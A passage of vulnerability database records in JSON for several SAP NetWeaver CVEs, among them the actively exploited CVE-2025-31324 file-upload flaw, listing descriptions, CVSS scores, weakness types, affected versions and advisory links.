  "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.",
  "cisaVulnerabilityName": "SAP NetWeaver Unrestricted File Upload Vulnerability",
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
              "matchCriteriaId": "F2B37045-2FB7-49BB-AE38-B84FAA6ADFB0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system."
    },
    {
      "lang": "es",
      "value": "SAP NetWeaver Visual Composer Metadata Uploader no cuenta con la protecci\u00f3n adecuada, lo que permite que agentes no autenticados carguen archivos binarios ejecutables potencialmente maliciosos que podr\u00edan da\u00f1ar gravemente el sistema host. Esto podr\u00eda afectar significativamente la confidencialidad, la integridad y la disponibilidad del sistema objetivo."
    }
  ],
  "id": "CVE-2025-31324",
  "lastModified": "2025-10-31T21:56:14.103",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 10.0,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 6.0,
        "source": "cna@sap.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2025-04-24T17:15:35.913",
  "references": [
    {
      "source": "cna@sap.com",
      "tags": [
        "Permissions Required"
      ],
      "url": "https://me.sap.com/notes/3594142"
    },
    {
      "source": "cna@sap.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://url.sap/sapsecuritypatchday"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Press/Media Coverage"
      ],
      "url": "https://www.bleepingcomputer.com/news/security/sap-fixes-suspected-netweaver-zero-day-exploited-in-attacks/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Press/Media Coverage"
      ],
      "url": "https://www.theregister.com/2025/04/25/sap_netweaver_patch/"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "US Government Resource"
      ],
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-31324"
    }
  ],
  "sourceIdentifier": "cna@sap.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-434"
        }
      ],
      "source": "cna@sap.com",
      "type": "Secondary"
    }
  ]
}

FKIE_CVE-2024-27898

Vulnerability from fkie_nvd - Published: 2024-04-09 01:15 - Updated: 2025-02-06 19:01
Summary
SAP NetWeaver application, due to insufficient input validation, allows an attacker to send a crafted request from a vulnerable web application targeting internal systems behind firewalls that are normally inaccessible to an attacker from the external network, resulting in a Server-Side Request Forgery vulnerability. Thus, having a low impact on confidentiality.
Impacted products
Vendor Product Version
sap netweaver 7.5

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:sap:netweaver:7.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "74F7C92A-48F7-456A-BDFF-91A482DE8546",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "SAP NetWeaver application, due to insufficient input validation, allows an attacker to send a crafted request from a vulnerable web application targeting internal systems behind firewalls that are normally inaccessible to an attacker from the external network, resulting in a\u00a0Server-Side Request Forgery vulnerability. Thus, having a low impact on confidentiality.\n\n"
    },
    {
      "lang": "es",
      "value": "La aplicaci\u00f3n SAP NetWeaver, debido a una validaci\u00f3n de entrada insuficiente, permite a un atacante enviar una solicitud manipulada desde una aplicaci\u00f3n web vulnerable dirigida a sistemas internos detr\u00e1s de firewalls que normalmente son inaccesibles para un atacante desde la red externa, lo que resulta en una vulnerabilidad Server-Side Request Forgery. Teniendo as\u00ed un bajo impacto en la confidencialidad."
    }
  ],
  "id": "CVE-2024-27898",
  "lastModified": "2025-02-06T19:01:07.703",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 1.4,
        "source": "cna@sap.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 1.4,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2024-04-09T01:15:48.583",
  "references": [
    {
      "source": "cna@sap.com",
      "tags": [
        "Permissions Required"
      ],
      "url": "https://me.sap.com/notes/3425188"
    },
    {
      "source": "cna@sap.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Permissions Required"
      ],
      "url": "https://me.sap.com/notes/3425188"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
    }
  ],
  "sourceIdentifier": "cna@sap.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-918"
        }
      ],
      "source": "cna@sap.com",
      "type": "Primary"
    }
  ]
}

FKIE_CVE-2024-25644

Vulnerability from fkie_nvd - Published: 2024-03-12 01:15 - Updated: 2025-04-10 19:40
Summary
Under certain conditions SAP NetWeaver WSRM - version 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application.
Impacted products
Vendor Product Version
sap netweaver 7.50

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
              "matchCriteriaId": "F2B37045-2FB7-49BB-AE38-B84FAA6ADFB0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Under certain conditions SAP NetWeaver\u00a0WSRM\u00a0- version 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application."
    },
    {
      "lang": "es",
      "value": "Bajo ciertas condiciones, SAP NetWeaver WSRM - versi\u00f3n 7.50, permite que un atacante acceda a informaci\u00f3n que de otro modo estar\u00eda restringida, lo que causa un bajo impacto en la confidencialidad sin ning\u00fan impacto en la integridad y disponibilidad de la aplicaci\u00f3n."
    }
  ],
  "id": "CVE-2024-25644",
  "lastModified": "2025-04-10T19:40:55.793",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 1.4,
        "source": "cna@sap.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 1.4,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2024-03-12T01:15:49.567",
  "references": [
    {
      "source": "cna@sap.com",
      "tags": [
        "Permissions Required"
      ],
      "url": "https://me.sap.com/notes/3425682"
    },
    {
      "source": "cna@sap.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Permissions Required"
      ],
      "url": "https://me.sap.com/notes/3425682"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
    }
  ],
  "sourceIdentifier": "cna@sap.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-732"
        }
      ],
      "source": "cna@sap.com",
      "type": "Primary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-noinfo"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Secondary"
    }
  ]
}

CVE-2025-42968 (GCVE-0-2025-42968)

Vulnerability from cvelistv5 – Published: 2025-07-08 00:36 – Updated: 2025-07-08 16:13
Summary
SAP NetWeaver allows an authenticated non-administrative user to call the remote-enabled function module which could grants access to non-sensitive information about the SAP system and OS without requiring any specific knowledge or controlled conditions. This leads to a low impact on confidentiality with no effect on integrity or availability of the application.
CWE
  • CWE-862 - Missing Authorization
Assigner
sap
Impacted products
Vendor Product Version
SAP_SE SAP NetWeaver (RFC enabled function module) Affected: SAP_BW 700, 701, 702, 710, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758, 816, 914, 916

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-42968",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-07-08T14:29:01.927973Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-07-08T16:13:36.672Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "SAP NetWeaver (RFC enabled function module)",
          "vendor": "SAP_SE",
          "versions": [
            {
              "status": "affected",
              "version": "SAP_BW 700"
            },
            {
              "status": "affected",
              "version": "701"
            },
            {
              "status": "affected",
              "version": "702"
            },
            {
              "status": "affected",
              "version": "710"
            },
            {
              "status": "affected",
              "version": "731"
            },
            {
              "status": "affected",
              "version": "740"
            },
            {
              "status": "affected",
              "version": "750"
            },
            {
              "status": "affected",
              "version": "751"
            },
            {
              "status": "affected",
              "version": "752"
            },
            {
              "status": "affected",
              "version": "753"
            },
            {
              "status": "affected",
              "version": "754"
            },
            {
              "status": "affected",
              "version": "755"
            },
            {
              "status": "affected",
              "version": "756"
            },
            {
              "status": "affected",
              "version": "757"
            },
            {
              "status": "affected",
              "version": "758"
            },
            {
              "status": "affected",
              "version": "816"
            },
            {
              "status": "affected",
              "version": "914"
            },
            {
              "status": "affected",
              "version": "916"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eSAP NetWeaver allows an authenticated non-administrative user to call the remote-enabled function module which could grants access to non-sensitive information about the SAP system and OS without requiring any specific knowledge or controlled conditions. This leads to a low impact on confidentiality with no effect on integrity or availability of the application.\u003c/p\u003e"
            }
          ],
          "value": "SAP NetWeaver allows an authenticated non-administrative user to call the remote-enabled function module which could grants access to non-sensitive information about the SAP system and OS without requiring any specific knowledge or controlled conditions. This leads to a low impact on confidentiality with no effect on integrity or availability of the application."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-862",
              "description": "CWE-862: Missing Authorization",
              "lang": "eng",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-07-08T00:36:31.953Z",
        "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "shortName": "sap"
      },
      "references": [
        {
          "url": "https://me.sap.com/notes/3621037"
        },
        {
          "url": "https://url.sap/sapsecuritypatchday"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Missing Authorization check in SAP NetWeaver (RFC enabled function module)",
      "x_generator": {
        "engine": "Vulnogram 0.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
    "assignerShortName": "sap",
    "cveId": "CVE-2025-42968",
    "datePublished": "2025-07-08T00:36:31.953Z",
    "dateReserved": "2025-04-16T13:25:42.158Z",
    "dateUpdated": "2025-07-08T16:13:36.672Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2025-42999 (GCVE-0-2025-42999)

Vulnerability from cvelistv5 – Published: 2025-05-13 00:17 – Updated: 2025-10-21 22:55
Summary
SAP NetWeaver Visual Composer Metadata Uploader is vulnerable when a privileged user can upload untrusted or malicious content which, when deserialized, could potentially lead to a compromise of confidentiality, integrity, and availability of the host system.
CWE
  • CWE-502 - Deserialization of Untrusted Data
Assigner
sap
Impacted products
Vendor Product Version
SAP_SE SAP NetWeaver (Visual Composer development server) Affected: VCFRAMEWORK 7.50

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-42999",
                "options": [
                  {
                    "Exploitation": "active"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-05-17T03:55:58.995900Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          },
          {
            "other": {
              "content": {
                "dateAdded": "2025-05-15",
                "reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-42999"
              },
              "type": "kev"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-10-21T22:55:16.662Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "government-resource"
            ],
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-42999"
          }
        ],
        "timeline": [
          {
            "lang": "en",
            "time": "2025-05-15T00:00:00+00:00",
            "value": "CVE-2025-42999 added to CISA KEV"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-05-13T16:29:26.892Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/"
          }
        ],
        "title": "CVE Program Container",
        "x_generator": {
          "engine": "ADPogram 0.0.1"
        }
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "SAP NetWeaver (Visual Composer development server)",
          "vendor": "SAP_SE",
          "versions": [
            {
              "status": "affected",
              "version": "VCFRAMEWORK 7.50"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eSAP NetWeaver Visual Composer Metadata Uploader is vulnerable when a privileged user can upload untrusted or malicious content which, when deserialized, could potentially lead to a compromise of confidentiality, integrity, and availability of the host system.\u003c/p\u003e"
            }
          ],
          "value": "SAP NetWeaver Visual Composer Metadata Uploader is vulnerable when a privileged user can upload untrusted or malicious content which, when deserialized, could potentially lead to a compromise of confidentiality, integrity, and availability of the host system."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-502",
              "description": "CWE-502: Deserialization of Untrusted Data",
              "lang": "eng",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-13T01:38:43.612Z",
        "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "shortName": "sap"
      },
      "references": [
        {
          "url": "https://me.sap.com/notes/3604119"
        },
        {
          "url": "https://url.sap/sapsecuritypatchday"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Insecure Deserialization in SAP NetWeaver (Visual Composer development server)",
      "x_generator": {
        "engine": "Vulnogram 0.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
    "assignerShortName": "sap",
    "cveId": "CVE-2025-42999",
    "datePublished": "2025-05-13T00:17:43.710Z",
    "dateReserved": "2025-04-16T13:25:50.942Z",
    "dateUpdated": "2025-10-21T22:55:16.662Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2025-31324 (GCVE-0-2025-31324)

Vulnerability from cvelistv5 – Published: 2025-04-24 16:50 – Updated: 2025-10-21 22:55
Summary
SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.
CWE
  • CWE-434 - Unrestricted Upload of File with Dangerous Type
Assigner
sap
Impacted products
Vendor Product Version
SAP_SE SAP NetWeaver (Visual Composer development server) Affected: VCFRAMEWORK 7.50

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-31324",
                "options": [
                  {
                    "Exploitation": "active"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-30T03:56:21.966706Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          },
          {
            "other": {
              "content": {
                "dateAdded": "2025-04-29",
                "reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-31324"
              },
              "type": "kev"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-10-21T22:55:17.980Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "technical-description"
            ],
            "url": "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/"
          },
          {
            "tags": [
              "government-resource"
            ],
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-31324"
          }
        ],
        "timeline": [
          {
            "lang": "en",
            "time": "2025-04-29T00:00:00+00:00",
            "value": "CVE-2025-31324 added to CISA KEV"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-05-02T17:13:30.650Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://www.theregister.com/2025/04/25/sap_netweaver_patch/"
          },
          {
            "url": "https://www.bleepingcomputer.com/news/security/sap-fixes-suspected-netweaver-zero-day-exploited-in-attacks/"
          },
          {
            "url": "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/"
          }
        ],
        "title": "CVE Program Container",
        "x_generator": {
          "engine": "ADPogram 0.0.1"
        }
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "SAP NetWeaver (Visual Composer development server)",
          "vendor": "SAP_SE",
          "versions": [
            {
              "status": "affected",
              "version": "VCFRAMEWORK 7.50"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eSAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.\u003c/p\u003e"
            }
          ],
          "value": "SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 10,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-434",
              "description": "CWE-434: Unrestricted Upload of File with Dangerous Type",
              "lang": "eng",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-04-24T16:50:27.706Z",
        "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "shortName": "sap"
      },
      "references": [
        {
          "url": "https://me.sap.com/notes/3594142"
        },
        {
          "url": "https://url.sap/sapsecuritypatchday"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Missing Authorization check in SAP NetWeaver (Visual Composer development server)",
      "x_generator": {
        "engine": "Vulnogram 0.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
    "assignerShortName": "sap",
    "cveId": "CVE-2025-31324",
    "datePublished": "2025-04-24T16:50:27.706Z",
    "dateReserved": "2025-03-27T23:02:06.906Z",
    "dateUpdated": "2025-10-21T22:55:17.980Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-27898 (GCVE-0-2024-27898)

Vulnerability from cvelistv5 – Published: 2024-04-09 00:52 – Updated: 2024-08-21 15:07
Summary
SAP NetWeaver application, due to insufficient input validation, allows an attacker to send a crafted request from a vulnerable web application targeting internal systems behind firewalls that are normally inaccessible to an attacker from the external network, resulting in a Server-Side Request Forgery vulnerability. This has a low impact on confidentiality.
CWE
  • CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
sap
Impacted products
Vendor Product Version
SAP_SE SAP NetWeaver Affected: 7.50

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:41:55.785Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://me.sap.com/notes/3425188"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "netweaver",
            "vendor": "sap",
            "versions": [
              {
                "status": "affected",
                "version": "7.50"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27898",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-08-21T15:05:55.533542Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-21T15:07:15.427Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "SAP NetWeaver",
          "vendor": "SAP_SE",
          "versions": [
            {
              "status": "affected",
              "version": "7.50"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eSAP NetWeaver application, due to insufficient input validation, allows an attacker to send a crafted request from a vulnerable web application targeting internal systems behind firewalls that are normally inaccessible to an attacker from the external network, resulting in a\u00a0Server-Side Request Forgery vulnerability. Thus, having a low impact on confidentiality.\u003c/p\u003e"
            }
          ],
          "value": "SAP NetWeaver application, due to insufficient input validation, allows an attacker to send a crafted request from a vulnerable web application targeting internal systems behind firewalls that are normally inaccessible to an attacker from the external network, resulting in a\u00a0Server-Side Request Forgery vulnerability. Thus, having a low impact on confidentiality.\n\n"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918: Server-Side Request Forgery (SSRF)",
              "lang": "eng",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-04-09T00:52:54.390Z",
        "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "shortName": "sap"
      },
      "references": [
        {
          "url": "https://me.sap.com/notes/3425188"
        },
        {
          "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
